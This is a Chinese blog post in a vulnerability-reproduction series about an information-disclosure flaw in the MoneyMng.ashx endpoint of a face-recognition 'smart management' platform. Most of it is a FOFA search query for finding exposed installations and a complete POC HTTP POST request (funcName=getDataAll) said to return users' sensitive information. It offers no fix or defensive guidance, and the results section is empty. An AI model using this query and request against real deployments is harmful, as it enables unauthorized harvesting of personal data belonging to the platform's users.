【漏洞复现】脸爱云一脸通智慧管理平台MoneyMng信息泄露漏洞

最新推荐文章于 2024-06-24 22:26:31 发布

晚风不及你ღ

最新推荐文章于 2024-06-24 22:26:31 发布

阅读量150

点赞数 5

文章标签： web安全

本文链接：https://blog.csdn.net/qq_37113223/article/details/138163246

版权

【漏洞复现】专栏收录该内容

146 篇文章 1 订阅

已下架不支持订阅

本文介绍了深圳市优卡特电子有限公司的脸爱云一脸通智慧管理平台MoneyMng.ashx存在的信息泄露漏洞。攻击者可以利用特定搜索语法获取系统用户的敏感信息。漏洞复现过程中，详细展示了平台的漏洞细节、POC及复现结果。

摘要由CSDN通过智能技术生成

漏洞描述：

深圳市优卡特电子有限公司脸爱云一脸通智慧管理平台MoneyMng.ashx存在信息泄露漏洞，攻击者可以通过此漏洞获取当前系统用户敏感信息。

搜索语法:

Fofa-Query: body="View/UserReserved/UserReservedTest.aspx"

漏洞详情：

1.脸爱云一脸通智慧管理平台。

2.漏洞POC：

POST /MoneyMng.ashx HTTP/1.1
Host: {{Hostname}}
Content-Length: 19
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

funcName=getDataAll

3.漏洞复现结果。